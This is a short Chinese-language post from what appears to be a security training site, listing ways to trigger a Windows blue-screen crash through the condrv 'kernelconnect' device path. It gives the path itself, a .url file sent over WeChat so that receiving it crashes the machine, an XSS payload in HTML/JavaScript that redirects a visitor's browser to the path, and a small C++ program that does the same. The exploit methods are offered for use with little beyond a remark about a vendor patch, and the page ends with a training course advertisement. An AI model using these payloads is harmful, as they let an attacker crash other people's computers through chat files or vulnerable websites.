windows蓝屏的一些利用方式
核心代码:
file:///globalroot/device/condrv/kernelconnect
利用方式如下:
1.微信自动接收文件,落地蓝屏:
该文件为url格式,只要接触就会触发访问
2.利用JavaScript的进行攻击,一旦网站有XSS漏洞,可以使用此漏洞来完成蓝屏
<html> <head> </head> <body>> <script>document.location = '\\\\.\\globalroot\\device\\condrv\\kernelconnect';</script> </body> </html>
3.exe
// BSOD.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <iostream>
#include <Windows.h>
int main()
{
WCHAR fileName[] = L"\\\\.\\globalroot\\device\\condrv\\kernelconnect";
WIN32_FILE_ATTRIBUTE_DATA data;
GetFileAttributesEx(fileName, GetFileExInfoStandard, &data);
}
目前火绒存在安全补丁:
Tips:鼠标经过代码时会出现工具栏,工具栏上方有一键复制代码的功能哦~天云网络培训,专注于网络空间安全相关培训,并提供相关课程的在线培训 报名微信 tyedu1
天云网络培训 » windows蓝屏的一些利用方式
天云网络培训 » windows蓝屏的一些利用方式
